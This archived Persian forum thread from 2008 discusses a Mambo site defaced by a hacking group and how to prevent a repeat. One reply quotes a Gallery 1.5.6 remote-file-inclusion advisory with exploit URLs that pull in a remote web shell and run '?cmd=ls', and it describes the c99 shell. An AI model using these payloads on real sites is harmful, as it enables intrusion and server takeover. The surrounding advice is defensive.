توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : سایتم دقایقی پیش هک شد
سلام
سایت من هک شد
TeamHacked By : Persian Boys Hacking TeamHacked
البته فقط یک مطلب را عوض کردند و نوشتند
TeamHacked By : Persian Boys Hacking TeamHacked و پسورد ادمین را هم عوض کردند.
چون مطلب استاتیک را ادیت کردند حدسم اینه که از طریق مامبو این کار را کردند نه از طریق سرور
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
البته من الان اون مطلب را درست کردم.
حدس شما چیه؟ چی کار کنم که دوباره نتونند هک کنند؟!
firoozmandan
06-29-2008, 08:57 AM
سلام
ورژن مامبو ؟
یا علی
firoozmandan
06-29-2008, 09:06 AM
سلام
register_global آن هست یا آف ؟
اگر آن هست ممکن هست از طریق مامبو بوده باشه اما اگر آف احتمالش خیلی کم میشه
+ اینکه ممکن هست از طریق سرور اقدام به تغییر پسورد ادمین کرده باشند و سپس لاگین و تغییر متون
+ پسورد شما از طریق تروجان لو رفته باشه و ...
یا علی
ببخشید از کجا میشود فهمید که چه کسانی آخرین لحظات وارد شده بودند.
firoozmandan
06-29-2008, 09:16 AM
لاگ موجود در Cpanel + لاگ موجود در سرور
register_global اف هست
آیا از طریق مامبو میشود فهمید که آخرین بار کی وارد شده بوده؟
کسی که اینکار را کرده احتمالا مامبو را هم خوب بلد بوده نه؟
firoozmandan
06-29-2008, 10:02 AM
سلام
خیر ...
ورود به مدیریت و ادیت مطلب زیاد مشکل نیست ;)
شما چه کامپوننت هایی روی سایت نصب کرده بودید ؟
فولدر ادمین پسورد داشت ؟
یا علی
Shahryar_NEO
06-29-2008, 11:08 AM
به همین سادگی محسن جان یک سایت هک میشه ؟!
firoozmandan
06-29-2008, 11:10 AM
منظورت رو دقیقا متوجه نمیشم ! توضیح بیشتر بده و سوال رو به صورت دقیق بپرس تا کامل جواب بدم
فولدر ادمین هم پسورد داشته، بله.
خوب کامپوننت های زیادی نصبه مثل ریموستری، سایت مپ،یوزر اکستندت و ..
Siamak
06-29-2008, 07:43 PM
من حدس میزنم که پسورد شما با روش هایی مثل کی لاگر ها و ... دزدیده شده باشه. چون قطعا وارد شدن به شاخه Administrator ربطی به مامبو نداره ;)
میتونید این مقاله من رو هم بخونید که شاید کمکتون کنه.
اميدوارم مورد استفاده قرار بگيره.
لطفا نظرات و پيشنهادات خودتون رو در خصوص این مقاله به من اعلام كنيد.
امنيت مامبو (<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>)
ارادتمند.
atoofy
06-29-2008, 10:26 PM
سلام.سیامک جان زحمتی که کشیدین قابل تقدیره ;)
معمولا این گونه کتاب های الکترونیک مخصوصا اگه توسط فرد یا تیم متخصصی نوشته شده باشه خیلی می تونه کمک حال بچه ها باشه.مثل همین مقاله :)
من که از این مقاله لذت بردم.
یــــــــــــــــــــــــ ـــــــــاعــــــــــــــ ـــــــــــــلی
amir.d
06-30-2008, 07:07 AM
سلام
میدونم که نباید برای تشکر پست بدم ولی کار سیامک جان فوق العاده بود. :D
مطالب خیلی مفیدی که برای جمع آوریش زحمت زیادی کشیده اید . واقعا عالی بود.
از مقاله خوبت ممنون . بازم از این کارا بکن ;)
موفق باشید
امیر
dj_ahmad
06-30-2008, 08:28 AM
من ندیدم چه تغیراتی دادن ولی احتمال میدم که از طریق باگ این کار رو کرده باشه و یک شلر آپلود کرده!!!! به سایت های زیر نگاه کنید.
این دوستمون از smf هم استفاده کرده.
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
اینها هم قبلا توسط همین تیم هک شده
Attacker : Persian Boys Hacking Team
Domain : <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
Attacker : Persian Boys Hacking Team
Domain : <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
Attacker : Persian Boys Hacking Team
Domain : <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
Attacker : Persian Boys Hacking Team
Domain : <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
dj_ahmad
06-30-2008, 08:35 AM
شما ببینید کدوم دایرکتوری ها پرمیژن 777 دارن.بعد محتویاتش رو بررسی کنید.
یا اینکه یه backup بگیرید و روی لوکال با یه آنتی ویروس up to date مثل کسپر اسکای اسکن کنید چون این آنتی ویروس شل اسکریپت ها رو میشناسه.
ببخشید یک شلر آپلود کرده یعنی چی؟
به smf چه ربطی داره
آیا هنوز هم میتونه هک کنه برای جلوگیری چه کنم
dj_ahmad
07-01-2008, 04:22 AM
در بسیاری از مواقع در بعضی cms ها نوعی باگ پیدا میشه با نام RFI یا remote flie inclusion و از این دست....
با استفاده از این باگ ها نفوزکر میتونه یه یه اسکریپت رو روی سرویس دهنده اجرا کنه مثلا این یه نمونه از باگ های مشهور RFI برای
################################################## ######################
################################################## ############
#gallery >> 1.5.6 Remote File Inclusion #
#Affected Software : gallery >> 1.5.6 #
#Download..: <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
heanet&filename=gallery-1.5.6.tar.gz&66134343 #
#Risk ..............: high #
#Date .........: 24/4/2007 #
################################################## ######################
################################################## ############
#Affected File:
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/setup/frame_test.php
gallery/contrib/joomla/admin.gallery.php
gallery/contrib/joomla/toolbar.gallery.php
gallery/contrib/mambo/admin.gallery.php
gallery/contrib/mambo/toolbar.gallery.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpnuke/modules.php.
gallery/contrib/phpnuke/modules.php.patch
################################################## ######################
################################################## ##############
# Exploit:
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>[target]/gallery/lib/content.php?include=<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
?cmd=ls
gallery/lib/content.php?=<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
gallery/lib/content.php?require=<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
gallery/lib/content.php?=<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
gallery/contrib/mambo/admin.gallery.php?require_once=<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
t?cmd=ls
gallery/contrib/mambo/toolbar.gallery.php?require_once=<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
txt?cmd=ls
#
#
################################################## ######################
################################################## #############
خوب البته CMS های اپن سورس بیشتر در معرض چنین باگ های هستند.
در کدهای بالبا اگر دقت کنید C99 اسم شلری است که برای این امر انتخاب شده که اگر نفوذگر حرفه ای باشد میتواند کل سرور را غبضه کند!!!
توصیه امنیتی: از مد ها و مامبوت های غیر معتبر استفاده نکنید چرا که این باگ ها از یک خطا در کد نویسی ناشی میشود عده زیادی هستند که مامبو را گسترش میدهند ولی جمع قلیلی به موارد امنیتی کد نویسی توجه دارند
این یک روش از هزاران روش مرسوم برای نفوذگری در وب بود
یا علی
ببخشید! برای جلوگیری الان راه حل ضد هک چیه باید چه مامبوت (غیر معتبر) را حذف کنیم
mhadaily
07-07-2008, 06:45 PM
مطمئنان داشتن اکستنشن های اضاقی از امنتیت سی ام اس میاره پایین این چیزی هست که خود سی ام اس هم بهتون میگه
اما هاست خوب خیلی در این موارد تاثیر گذار هست
dj_ahmad
07-08-2008, 07:57 AM
بله دوست عزیز سرور میزبان بسیار بسیار مهم هست
مثلا این رو ببینید
******
به این میگن شلر c99 همون طور که میبینید
Disabled functions : exec,system,passthru,readfile,shell_exec,escapeshe llarg,escapeshellcmd,proc_close,proc_open,ini_alte r,dl,popen,parse_ini_file,show_source
با غیر فعال کردن فانکشن های اضافی روی سرور توسط مدیر امنیت سیتم تا حدود خیلی زیادی بالا رفته البته اونایی که خیلی حرفه ای هستند این محدودیت ها رو دور میزنند!!!
اگه cms ضعف امنیتی داشته باشه میشه مشابه این اسکریپت ها رو روش آپلود کرد یا این که فراخوانی کرد الباقیش دیگه هنر مدیر سرور هست که .....
**** مسیر C99 حذف شد ;)
dj_ahmad
07-08-2008, 08:00 AM
یه چیز یادم رفت بگم انم پرمیژن بندی هست با یه پرمیژن بندی مناسب میشه کلی از حملات آماتوری و نیمه آماتوری رو خنثی کرد
این شلر رو هم چند روز دیگه پاک میکنم(صرفا جنبه آموزشی داشت)
besctripts.ir
07-15-2008, 04:30 PM
سايت من هم توسط همين گروه هك شد.
ولي فكر نكنم به خاطر سرور باشه.چون من روي هاستم چند تا دامين ديگه دارم.
اين هم لينك اثبات:
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
Clubnet
07-15-2008, 04:33 PM
دستان اینجا چه خبره؟ :(
firoozmandan
07-15-2008, 05:43 PM
سلام
چک کردم شما از مامبو 4.6.2 استفاده میکردید .
در 3 صورت ممکن هست هک شده باشید :
1- پسورد شما لو رفته باشه ( که احتمالش کمه )
2- سرور مشکلی داشته باشه
3- REGISTER GLOBAL = ON باشه
مورد 3 احتمالش خیلی بیشتر هست . این مورد رو چک کنید و به ما بگید .
یا علی
Clubnet
07-15-2008, 05:49 PM
آره احتمالا همین سومی باشه !
منم جوملا نصب کرده بودم این مقدار رو رعایت نکردم! باور کنید شب خوابیدم صبح دیدم سایتمو هک کردند :(
besctripts.ir
07-15-2008, 06:09 PM
1- فكر نكنم.چون اين گروه مامبوهاي ديگه اي رو هم هك كردن.
2-الان دو سه تا سايت ديگه هم روي هاستم دارم كه به اون ها كاري نداشتند.
امروز بعد از ظهر داشتم آمار وبگذر رو نگاه مي كردم كه ديدم يه نفر از سايت <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> آمدن تو سايتم.يه كم مشكوك شدم ولي وقتي به سايت مذكور رفتم چيزي از هك شدن سايتم نديدم.تا اينكه شب ديدم دوباره يكي از همين سايت آمده كه وقتي بر روي لينك كليك كردم ديدم كه ...!!! :'(
ولي در آمار ساير سايت هام كه روي همين هاست بوده رد پايي ازشون نبود!
3-اگه منظورتون register_globals هست آفه!
پسورد رو هم عوض كرده بودن كه از طريق فراموشي رمز عبور تونستم بدستش بيارم.
firoozmandan
07-15-2008, 06:16 PM
سلام
مشکل از مامبو قطعا نیست . همین سایت خود ما ... یا سایت کسایی که روی مامبوسرور هستند ... یا ... خدا رو شکر هیچ مشکلی نداشته و نداره ...
گزارشی از باگ در مامبو هم منتشر نشده ( در صورت آف بودن رجیستر گلوبال )
پیشنهاد میکنم با مدیر سرورتون صحبت کنید تا لاگها رو چک کنند و دقیقا بگن که مشکل از کجا بوده
یا علی
besctripts.ir
07-16-2008, 04:57 AM
يه چيز جالب!
من هاستم رو از سايت گيتي هاست خريدم و سايت گيتي هاست هم يكي ز سايت هايي هست كه توسط اين گروه هك شده.
جالبيش اين جاست كه اين سايت هم از مامبو استفاده مي كنه!
firoozmandan
07-16-2008, 04:59 AM
سلام
مشکل از مامبو قطعا نیست . همین سایت خود ما ... یا سایت کسایی که روی مامبوسرور هستند ... یا ... خدا رو شکر هیچ مشکلی نداشته و نداره ...
گزارشی از باگ در مامبو هم منتشر نشده ( در صورت آف بودن رجیستر گلوبال )
پیشنهاد میکنم با مدیر سرورتون صحبت کنید تا لاگها رو چک کنند و دقیقا بگن که مشکل از کجا بوده
یا علی
سلام
اگر ممکن هست یوزرنیم + پسورد هاست رو بدید من چند مورد رو تست کنم
یا علی
mohsennowruzi
07-16-2008, 01:35 PM
آقا ببخشید من میپرم وسط بحث!
این روشن بودن رجیستر گلوبال چه مشکلی ایجاد میکنه؟
من که مسئول سرور نیستم! و نمیتونم این رجیستر رو خاموشش کنم، حالا باید چیکار کنم؟
موقع نصب مامبو نسخه 4.6.5 نوشته بود که رجیستر گلوبال روشن هست. آیا به جز خاموش کردنش توسط مسئول سرور راهی برای ما هست که از نفوذ جلوگیری کنیم؟
abtin
07-16-2008, 05:25 PM
در فایل .htaccess
این کد را قرار دهید تا رجیستر گلوبال خاموش شود .
php_flag register_globals off
mohsennowruzi
07-16-2008, 06:26 PM
ببخشید من مامبو رو رو روت هاست نصب نکردم بلکه تو یه فولدر نصب کردم.
تو اون فولدر هم همچین فایل نیست فقط یه فایل هست به اسم: htaccess.txt.45x
حالا باید چیکار کنم، یه فایل با این اسم بسازم؟ این فایل رو باید تو همون فولدری که مامبو نصب هست بزارم؟
اگه مهم هست نسخه سی پنل رو سرور یازده هست. ممکنه این فایل باشه و نشون نده؟ من اون اول که می پرسه گفتم فایلهای مخفی یعنی اون هایی که با . شروع می شن رو نشون بده ولی همچین فایلی نشون نمی ده.
atoofy
07-16-2008, 07:50 PM
سلام.معمولا یه فایل htaccess.txt توی حتما توی نسخه ی خام مامبو (بسته ی با فرمت زیپ) موجود هست.شما اون را آپلود کنید توی فولدر مامبوتون و بعد به htaccess. تغییر نامش بدید.
البته من یه نگاه انداختم دیدم مثل اینکه محتویات htaccess.4.5.txt یه فرق هایی با htaccess.txt داره.حالا نمی دونم اگه شما همون htaccess.4.5.txt را هم به htaccess. تغییر نام بدید همون کارایی را خواهد داشت یا نه. ولی فعلا برای اطمینان بهتره که همون فایل htaccess.txt را به htaccess. تغییر نام بدید.
:: از دوستان اگر کسی اطلاع دارین که تغییر نام htaccess.4.5.txt به htaccess. با تغییر نام htaccess.txt به .htaccess فرقی داره یا نه بفرمایین.
یــــــــــــــــــــــــ ـــــــــاعــــــــــــــ ـــــــــــــــــلی
jbasoft
07-16-2008, 09:31 PM
سلام.... فکر کنم جواب سوال دوستمون رو اشتباهی در یک تاپیک دیگه دادم.... عذر می خوام ....لی باید بگم که بله فرق داره..... در مامبو 4.6.5 htaccess.txt یا htaccess. وجود نداره وباید اون رو درست کنید..... بهتره یک جستجو در سایت بکنید تاپیکش هست...
راستی میتونید از خود تنظیمات مدیریت سایت در بخش تنظیمات کلی و در تب سرور می تونید شبیه ساز Register Globals رو خاموش کنید و یا از طریق htaccess. که دوستمون اشاره کرد عمل کنید....
موفق و پیروز و پاینده باشید....
besctripts.ir
07-17-2008, 07:07 AM
سلام
با مدير سرور تماس گرفتم،گفتن كه نفوذ از طريق mysql server بوده
فكر كنم به خاطر همين هم اكثرا سيستم هاي مامبو را هك كردن.
firoozmandan
07-17-2008, 07:13 AM
سلام
خوشحالم که بالاخره متوجه موضوع شدید .
اگر MySql مشکل داشته ربطی به سایت های مامبو یا ... نداره . این امکان فراهم میشه که تمام سایتهای که دیتابیس دارن هک بشن ...
یا علی
radman
08-17-2008, 12:53 PM
سلام به دوستان
میبینم که بحث داغه.
طبق شواهد و گفته دوستان اینگونه دسترسی به سایت و هک شدن از طریق SQL INJECTION انجام میشه و اگه هکرخان دسترسی از نوع SHELL داشته باشه دیگه نمیاد وقت خودشو واسه رمزگشایی برای پسورد HASH شده ادمین سایت بزاره و خیلی راحت سایت رو deface میکنه.حال اگه SHELL داشته باشه و پرمیشن فایلها و فولدرها به صورتی باشه که هکر نتونه هیچ تغیری در فایلها بده میاد پسورد ادمین رو میزنه و ادامه داستان...
dj_ahmad
08-17-2008, 01:31 PM
هميشه هم اين طوري نيست ممكن هست طرف شل داشته باشه ولي پرميژن اديت كردن نداشته باشه.تو اين جور مواقع هكر تازه كار مياد از روي config يوزر و پس ديتابيس رو ميخونه و كانكت ميكنه به ديتابيس و...
radman
08-17-2008, 02:22 PM
خوب دوست عزیز من در اخر گفته ام همینو گفتم.
dj_ahmad
08-17-2008, 03:28 PM
نيازي به دونستن يا درآوردن پسورد ادمين نيست.
radman
08-17-2008, 04:29 PM
منظورم همون تغییر پسورد مدیر از طریق نفوذ به دیتابیس بود که دیگه اونو بخاطر اینکه من با موبایلم در حال پست دادن بودم دیگه حال نوشتن ادامه داستان رو نداشتم.
یکی از موارد جلو گیری هک شدن از این روش (یعنی تغییر پسورد مدیر از طریق نفوذ به دیتابیس) کد کردن فایل configuration.php هست.
در کل راه زیاده و امنیت و ضدامنیت همش به خلاقیت بستگی داره ...
یا حق
dj_ahmad
08-17-2008, 05:57 PM
نه نياز به دونستن يوزر ادمين هست نه نياز به عوض كردن آن!!!
firoozmandan
08-18-2008, 06:20 AM
+ link=topic=14473.msg83091#msg83091 date=1218990550]
منظورم همون تغییر پسورد مدیر از طریق نفوذ به دیتابیس بود که دیگه اونو بخاطر اینکه من با موبایلم در حال پست دادن بودم دیگه حال نوشتن ادامه داستان رو نداشتم.
یکی از موارد جلو گیری هک شدن از این روش (یعنی تغییر پسورد مدیر از طریق نفوذ به دیتابیس) کد کردن فایل configuration.php هست.
در کل راه زیاده و امنیت و ضدامنیت همش به خلاقیت بستگی داره ...
یا حق
سلام
کد کردن این فایل هم تاثیری نداره . اگر هکر واقعا یه ذره از PHP سرش بشه میتونه با یک اینکلود ساده و چند دستور و یه Query هر تغییری بخواد توی دیتابیس بده
یا علی
من 3 تا فایل دارم
htaccess.txt.45x
htaccess.4.5.x
htaccess.txt
در کدام فایل باید کد زیر را قرار بدهم.
php_flag register_globals off
با سلام شما باید در فایل htaccess. این کد رو قرار بدید یا در htaccess.txt سپس این فایل رو به htaccess. تغییر نام بدید
موفق و سربلند باشید.
vBulletin® v4.2.5, Copyright ©2000-2026, Jelsoft Enterprises Ltd.